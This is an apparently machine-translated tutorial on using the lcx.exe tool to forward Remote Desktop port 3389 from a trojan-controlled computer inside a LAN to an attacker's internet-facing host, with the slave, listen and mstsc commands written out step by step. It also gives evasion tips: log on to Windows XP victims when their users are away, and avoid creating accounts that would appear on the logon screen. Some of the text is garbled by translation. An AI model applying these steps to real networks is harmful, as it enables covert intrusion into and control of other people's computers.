Attack and Defense practices: Use LCX for Intranet port forwarding

Theoretically, as long as the computer connected to the network is accessible, it is difficult to implement it due to technical level or other reasons. For example, a computer in the LAN only opens Web Services, this service is only available for Intranet users, but there is no direct access for Internet users. Therefore, to allow Internet users to access system services in the LAN, port ing and other operations must be performed. Port ing is often used when intruding into the Intranet. It is very convenient to use port ing, especially when you need to log on to remote terminal services.

Lcx.exe is a port forwarding tool that forwards port 3389 on port A to B with an Internet IP address. In this way, port 3389 connected to port B is equivalent to port 3389 linked to host. LCX programs are mostly used when computers (BOTS) under control are in the Intranet. The computers under control may be in trojan programs, although they can be controlled, however, it is not easy to log on to the local machine using a remote terminal for management. Therefore, in many cases, you may try to enable port 3389 on the controlled computer and then forward the port through LCX and other programs, connect to the remote terminal of the controlled computer locally for management and use.

　　1. Determine the IP address of the controlled computer

Enable the remote terminal on the controlled computer and run the "ipconfig/all" command to check the network configuration. 1 shows that the IP address of the computer is "192.168.80.129"

　　

Figure 1 determine the IP address of the controlled computer

　2. Execute the port forwarding command on the controlled computer

Run "LCX-slave 218" on the controlled computer. 69. *. * 51 192.168.80.129 3389 ", as shown in figure 2, some prompts are displayed after the execution is completed. If it is displayed as" make a connection to 218. 69. *. *: 51 indicates that port forwarding is correct.

　　

Figure 2 run the Forward Command on the controlled computer

Description

LCX has three commands. The First Command (LCX-lister 51 3389) is executed on a computer with an independent Internet IP address, indicating listening to port 51 on the local machine, this port is mainly used to receive data forwarded from the controlled computer port 3389. The second command (LCX-slave 218. 69. *. * 51 192.168.80.129 3389) indicates to forward port 3389 of the local IP address 192.168.80.129 to the remote address "218. 69. *.. The third command is port redirection.

　3. Execute the listening command on the local machine

Run the "LCX-lister 51 3389" command in the path of the lcx.exe program to listen to port 51. After successful listening, the data shown in Figure 3 is displayed.

　　

Figure 3 listening to port 51 on the local machine

Note:

(1) The listening port on the local machine must be an unused port. You can run the "netstat-an | find" 51 "command to check the port, if no result is displayed, port 51 can be used for listening.

(2) The connection data is displayed continuously after the controlled computer establishes a connection with the local machine. (4) If no data is sent or accepted, the connection fails.

　　

Figure 4 successful connection

　　4. log on to the local machine using a remote terminal

Enter the "mstsc" command at the DOS prompt to open the remote terminal connector, enter "127.0.0.1", and then click "Connect" to connect to the remote terminal. After the logon interface appears, the user name and password are separately generated, after the verification is passed, you can remotely access the desktop of the controlled computer, as shown in Figure 5. Enter the "ipconfig/all" and "Net user" commands to view the network configuration and user information.

　　

Figure 5 remote logon to the controlled computer

Note:

(1) If the controlled computer is a server, you can directly log on to the computer. If the controlled computer is a Windows
XP system, it is best to select the time when the user does not log on to the computer, otherwise it is easy to be found.

(2) do not easily create an account on the controlled computer, especially Windows XP. After an account is created, it will be displayed on the logon page immediately.

　5. View local connections

When "netstat-an" is used on the controlled computer to view all current connections, you can see that the controlled computer is connected to its own remote terminal, as shown in figure 6, the actual port 3389 is connected to port 51 of the local machine.

　　

Figure 6 view the actual network connection

In this case, through the LCX port forwarding program, the local computer can be successfully connected to the Intranet of the controlled computer, which can be easily managed remotely. It is particularly useful for Intranet penetration.